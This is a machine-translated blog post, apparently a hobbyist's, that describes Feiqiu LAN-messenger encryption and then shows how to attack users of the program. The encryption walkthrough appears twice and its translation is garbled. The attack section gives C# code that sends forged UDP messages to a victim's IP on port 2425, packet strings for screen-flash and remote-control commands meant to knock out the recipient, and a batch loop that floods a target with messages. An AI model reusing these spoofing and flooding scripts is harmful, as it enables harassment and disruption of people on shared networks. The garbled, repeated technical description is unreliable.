Today I studied the data packets of feiqiu. After packet capture, I found that the data was encrypted. The encryption principle I found on the Internet is a bit complicated:
Reprinted I wanted to write a detailed description, and my mood was a little bad. forget it ....
Encrypted communication refers to the encryption of chat information between two feiqiu users. encrypted communication data packets are divided into two parts: one is the encryption of chat messages, the other is the encryption of the key of the encrypted chat messages, and then the two encrypted content are converted into explicit characters.
A wants to send chat information to B... what does the software do?
1: A sends the following UDP packet to B
Char qingqiumishi [] = "20171bt2_82 #128 #00065b901234 #0 #0 #0: 1217863660: Administrator: HD-SJK-YHF: 114: 21003 ";
2: B answers a packet similar to the above structure to a, which contains an encrypted communication key that is converted into a display character.
3: A encrypts and sends the key received to B.
①: How can I convert the received key? Like this: Convert the string "eafb9d45" to 0x45, 0x9d, 0xfb, or 0xea. Change the header and tail positions. The parsed Communication Key is 0x80.
②: Use cryptacquirecontext () to create a named password container and import the Communication Key parsed above with cryptimportkey, the key at import = Fixed data with a length of 0x10 + the key parsed above,
③: Two data tables are used for encryption. In this case, Tables A and B are called. Use the key imported above to initialize these two tables ( Program Use cryptgenrandom to generate a random number between this step and the previous step, so the encryption result is different each time)
In addition to the special instructions, the following operations all have DWORD characters.
(1): assigns data of a memory address to Table A with a length of 0x12;
(2): assigns data of a memory address to table B, with a length of 0x400;
(3): use the first 0x10 characters of the key imported in step 2 to cycle the data in the same or table.
(4): Call a two-phase DWORD encrypted with the encryption function 0, overwrite the result of the two Dwords in front of Table A, and then use the result as the next round of encryption word to call function encryption, the result overwrites the content after Table. Repeat the preceding operation until all the content in Table A is overwritten.
Encryption: Call the encryption function to encrypt the last encrypted result. Then, encrypt the two Dwords of the encrypted result to overwrite the content of Table B. This operation is performed cyclically until table B overwrites the data.
Now the two tables have been initialized.
④: Fill in the message to be encrypted. Set the length of the message to be encrypted to an integer multiple of 8, that is, if the length is 6 (including the ending \ 0 \ character), the length to be encrypted (6/8 of the quotient + 1) * 8 = 8. Fill in characters where the buffer length of the message to be encrypted is insufficient = length of the message to be encrypted -- original message length = 0x02.
⑤: Encrypt the message. Each time a function is called to encrypt two DWORD values, the result is converted to the high and low bits, stored in the original address, and cyclically continues until the encryption is completed.
6: encryption key. Use cryptencrypt () to encrypt the keys of initialized tables A and B.
7. The encrypted conversion result is a printable character. The format is similar to this: Convert 0xea, 0xab, 0x90, and 0x12 to a string of "1290 Abea". Note that the header and tail are changed, while the message ciphertext is not changed.
Sent: the sending and removing locations. The encrypted key ciphertext and message ciphertext are combined in a certain form and sent.
I would like to give a picture of how the test program was sent to the target program. Who knows the link? I don't know where to upload the test program ....
By the way, the authorization code generation process of the program is not necessarily correct. An encryption key is generated (different from each machine). This key is used to initialize tables A and B and call function encryption signatures, use the encrypted result to generate an authorization code ....
Finally, feiqiu is really good. I hope you will only do some technical research and do not do some registration machines, message attack devices or anything. It will be like CS if you get it, if you cheat too much, you will not be interested in playing the game. It's not the blame for cheating people...
I wanted to write a detailed description, and my mood was a little bad. forget it ....
Encrypted communication refers to the encryption of chat information between two feiqiu users. encrypted communication data packets are divided into two parts: one is the encryption of chat messages, the other is the encryption of the key of the encrypted chat messages, and then the two encrypted content are converted into explicit characters.
A wants to send chat information to B... what does the software do?
1: A sends the following UDP packet to B
Char qingqiumishi [] = "20171bt2_82 #128 #00065b901234 #0 #0 #0: 1217863660: Administrator: HD-SJK-YHF: 114: 21003 ";
2: B answers a packet similar to the above structure to a, which contains an encrypted communication key that is converted into a display character.
3: A encrypts and sends the key received to B.
①: How can I convert the received key? Like this: Convert the string "eafb9d45" to 0x45, 0x9d, 0xfb, or 0xea. Change the header and tail positions. The parsed Communication Key is 0x80.
②: Use cryptacquirecontext () to create a named password container and import the Communication Key parsed above with cryptimportkey, the key at import = Fixed data with a length of 0x10 + the key parsed above,
③: Two data tables are used for encryption. In this case, Tables A and B are called. use the imported key to initialize the two tables (the program uses cryptgenrandom to generate a random number between the two tables and the previous step, so the encryption result is different each time)
In addition to the special instructions, the following operations all have DWORD characters.
(1): assigns data of a memory address to Table A with a length of 0x12;
(2): assigns data of a memory address to table B, with a length of 0x400;
(3): use the first 0x10 characters of the key imported in step 2 to cycle the data in the same or table.
(4): Call a two-phase DWORD encrypted with the encryption function 0, overwrite the result of the two Dwords in front of Table A, and then use the result as the next round of encryption word to call function encryption, the result overwrites the content after Table. Repeat the preceding operation until all the content in Table A is overwritten.
Encryption: Call the encryption function to encrypt the last encrypted result. Then, encrypt the two Dwords of the encrypted result to overwrite the content of Table B. This operation is performed cyclically until table B overwrites the data.
Now the two tables have been initialized.
④: Fill in the message to be encrypted. Set the length of the message to be encrypted to an integer multiple of 8, that is, if the length is 6 (including the ending \ 0 \ character), the length to be encrypted (6/8 of the quotient + 1) * 8 = 8. Fill in characters where the buffer length of the message to be encrypted is insufficient = length of the message to be encrypted -- original message length = 0x02.
⑤: Encrypt the message. Each time a function is called to encrypt two DWORD values, the result is converted to the high and low bits, stored in the original address, and cyclically continues until the encryption is completed.
6: encryption key. Use cryptencrypt () to encrypt the keys of initialized tables A and B.
7. The encrypted conversion result is a printable character. The format is similar to this: Convert 0xea, 0xab, 0x90, and 0x12 to a string of "1290 Abea". Note that the header and tail are changed, while the message ciphertext is not changed.
Sent: the sending and removing locations. The encrypted key ciphertext and message ciphertext are combined in a certain form and sent.
I would like to give a picture of how the test program was sent to the target program. Who knows the link? I don't know where to upload the test program ....
By the way, the authorization code generation process of the program is not necessarily correct. An encryption key is generated (different from each machine). This key is used to initialize tables A and B and call function encryption signatures, use the encrypted result to generate an authorization code ....
Finally, feiqiu is really good. I hope you will only do some technical research and do not do some registration machines, message attack devices or anything. It will be like CS if you get it, if you cheat too much, you will not be interested in playing the game. It's not the blame for cheating people...
Therefore, I wanted to change the data packet to make an attacker's plan.
But I forgot another tool-Feige
Relationship between them: The feiqiu interface is similar to QQ and compatible with Feige. The function is more powerful than Feige. In other words, there is no conciseness of Feige. The two can communicate with each other in the same LAN.
Therefore, I am very pleased with the results of sending a message to feiqiu via a Flying Pigeon: Completely plaintext data packets.
Example: I sent a message: Hello.
Captured data packet: "1: 1251142858: Administrators: 2d46a2a23307456: 655904: Hello." ------- 1: 1251142858: My login SYSTEM account: computer name: 655904: Content
In this case, it's easy. Hello can be changed at will. You only need to know the protocol type (UDP), attack Port (2425), and victim IP address; Code
1 Private Void Timer2_tick ( Object Sender, eventargs E)
2 {
3
4 Udpclient udpsender;
5 Udpsender = New Udpclient ();
6 Ipendpoint IEP = New Ipendpoint (IPaddress. parse (textbox1.text ), 2425 );
7 Byte [] First = System. Text. encoding. utf8.getbytes ( " 1: 1251142858: Administrators: 2d46a2a23307456: 655904: Hello./; Bin " );
8
9 Udpsender. Send (first, first. length, IEP );
10 }
Because the Flying Pigeon cannot send down the autumn expression, but the autumn expression is actually very simple, for exampleCodeThe sent content in is "Hello./; bin". The actual received content is displayed as "hello ."
----------------------------------------------------------------- Split line
The above is just a variable transfer of the sent content through the Flying Pigeon. However, the attack effect is not obvious, and the following points are dangerous (the flash screen is very good, and the other party can be instantly dropped)
1. Pop-up screen ------------ "1_lbt4_35 #128 # 0022680c51ac #0 #35807 #0: 1250815230: Administrators: 1d46a2a23307456: 209 :"
2. Speech listen lbt4_35 #128 # 0022680c51ac #0 #35807 #0: 1250815700: Administrator: 1d46a2a23307456: 160:
3. Remote maid #128 # 0022680c51ac #0 #35807 #0: 1250815709: Administrator: 1d46a2a23307456: 176:
4. Launch 1_lbt4_35 #128 # 0022680c51ac #0 #35807 #0: 1250818260: Administrator: 1d46a2a23307456: 6291457:... 802
5. deprecate 1_lbt4_35 #128 # 0022680c51ac #0 #35807 #0: 1250818545: Administrator: 1d46a2a23307456: 6291458:... 802
How to obtain the data packet?
Packet Capture I choose --------------- Iris
---------------------------------------------
Next, it will be simpler, because Feige uses both feiqiu and also provides DOS to send messages:
Pigeon 2007 description (Part)
-Supports sending messages using commands.
The command format is as follows:
Ipmsg.exe [port]/MSG [/log] [/Seal] For example:
C: \> ipmsg.exe/MSG/Seal 192.168.1.222 hello.-supports sending messages using commands
Therefore, you can also attack feiqiu users based on pigeons: 1 @ Echo off
2 : Loop
3 Ipmsg2007.exe / MSG / Log / Seal 192.168 . 1.222 Hello.
4 Goto : Loop
5 Rem
Conclusion: WriteArticleVery tired. I wrote it for the first time. come on later.
